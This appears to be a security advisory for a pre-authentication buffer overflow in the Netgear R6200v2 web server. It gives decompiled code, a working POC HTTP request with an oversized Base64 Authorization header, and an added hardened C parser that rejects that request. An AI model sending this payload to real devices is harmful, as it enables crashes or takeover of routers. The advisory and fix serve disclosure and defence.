Description
A pre-authentication global buffer overflow vulnerability exists in the web server component of the Netgear R6200v2 router. The issue resides within the sub_ED50 function during the processing of HTTP Authorization headers. The server extracts the Base64-encoded authentication string and performs an in-place decoding via the base64decode utility, which lacks boundary checks. Subsequently, the decoded username is copied into a fixed-size 24-byte global buffer (byte_254FFC) using the unsafe strcpy function. By providing a specially crafted credentials string, an unauthenticated attacker can overflow this buffer to overwrite adjacent critical variables and pointers in the .bss segment, such as the dword_255020 URL pointer. This memory corruption can be leveraged to achieve arbitrary code execution or cause a denial-of-service condition on the affected device.
/* Vulnerability Location: sub_ED50 in httpd */
// 1. Taint Source: Extracting the Base64 encoded credentials from the Authorization header
v43 = stristr(v18, "Authorization: Basic ");
v39 = v43 + 21; // 21 == strlen("Authorization: Basic "), so v39 points at the Base64 payload
// 2. Unsafe Transformation: Decoding the taint without any length or boundary checks
base64decode(v39);
// 3. Taint Separation: Locating the colon separator to isolate the username
v46 = strchr(v39, 58); // Find ':' (ASCII 58)
if ( v46 )
{
    *v46 = 0; // Null-terminate the username part
    // 4. Vulnerable Sink: Unsafe strcpy into a fixed-size global buffer
    // byte_254FFC is allocated only 24 bytes (0x18) in the .bss segment
    strcpy(byte_254FFC, v39);
}
POC
GET /start.htm HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhOmJiYmJiYmJiYg==
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
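The following is an added example, not code from the advisory or from the Netgear firmware, showing what a corrected version of the header-parsing sequence described above looks like: a Base64 decoder that refuses to write past its output buffer, and a username copy that rejects a credential that would not fit the 24-byte destination instead of overflowing it. The function names, the scratch-buffer size, the return codes and the sample requests are assumptions made for this example; the oversized credential in the first sample is the Authorization value from the POC above, and the second sample carries a benign "admin:password" credential. The router's own code uses a case-insensitive stristr; plain strstr is used here for brevity.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Size of the global username buffer (byte_254FFC) named in the advisory. */
#define USERNAME_BUF_SIZE 24
/* Bounded scratch space for the decoded credential (size chosen for this example). */
#define DECODED_MAX 512

/* Map one Base64 alphabet character to its 6-bit value, or -1 if it is not in the alphabet. */
static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Bounded Base64 decode: never writes beyond out[cap - 1].
 * Returns the number of decoded bytes, or -1 on a non-alphabet character or
 * when the output would exceed cap. Decoding stops at the first '=' padding. */
int base64_decode_bounded(const char *in, size_t n, unsigned char *out, size_t cap)
{
    uint32_t acc = 0;
    int bits = 0;
    size_t written = 0;
    for (size_t i = 0; i < n; i++) {
        if (in[i] == '=')
            break;
        int v = b64val((unsigned char)in[i]);
        if (v < 0)
            return -1;
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (written >= cap)
                return -1;          /* the boundary check the original base64decode lacks */
            out[written++] = (unsigned char)((acc >> bits) & 0xFF);
        }
    }
    return (int)written;
}

/* Hardened replacement for the vulnerable sequence: locate the header, decode into a
 * bounded scratch buffer, split at ':' and copy the username only if it fits in
 * user_cap bytes including the terminating NUL.
 * Return codes:  1 = username extracted
 *                0 = no "Authorization: Basic " header present
 *               -1 = malformed credential (bad Base64, too long to decode, or no ':')
 *               -2 = username longer than the destination buffer allows */
int extract_basic_user(const char *request, char *user, size_t user_cap)
{
    const char *hdr = strstr(request, "Authorization: Basic ");
    if (!hdr)
        return 0;
    const char *b64 = hdr + strlen("Authorization: Basic ");
    size_t b64len = strcspn(b64, "\r\n");   /* the credential ends at the end of the header line */

    unsigned char decoded[DECODED_MAX];
    int dlen = base64_decode_bounded(b64, b64len, decoded, sizeof decoded);
    if (dlen < 0)
        return -1;

    const unsigned char *colon = memchr(decoded, ':', (size_t)dlen);
    if (!colon)
        return -1;

    size_t ulen = (size_t)(colon - decoded);
    if (ulen >= user_cap)
        return -2;                          /* reject the request instead of overflowing */

    memcpy(user, decoded, ulen);
    user[ulen] = '\0';
    return 1;
}

/* Convenience check for callers and tests: 1 if extraction succeeds and yields `expected`. */
int extracted_user_is(const char *request, const char *expected)
{
    char user[USERNAME_BUF_SIZE];
    return extract_basic_user(request, user, sizeof user) == 1 && strcmp(user, expected) == 0;
}

/* Constructed sample requests (headers trimmed to what the parser looks at). */
static const char POC_REQUEST[] =
    "GET /start.htm HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhOmJiYmJiYmJiYg==\r\n\r\n";
static const char BENIGN_REQUEST[] =
    "GET /start.htm HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n";   /* "admin:password" */
static const char NOAUTH_REQUEST[] =
    "GET /start.htm HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n";

int main(void)
{
    const char *names[] = { "POC", "benign", "no-auth" };
    const char *reqs[]  = { POC_REQUEST, BENIGN_REQUEST, NOAUTH_REQUEST };
    for (int i = 0; i < 3; i++) {
        char user[USERNAME_BUF_SIZE];
        int rc = extract_basic_user(reqs[i], user, sizeof user);
        printf("%-8s rc=%d%s%s\n", names[i], rc, rc == 1 ? " user=" : "", rc == 1 ? user : "");
    }
    return 0;
}
```

Run as-is, the POC request is rejected with -2 before any byte reaches the 24-byte username buffer, the benign request yields "admin", and a request without the header yields 0. The same length test is what a front-end filter or IDS rule would apply to flag requests whose decoded Basic username exceeds the firmware's buffer size.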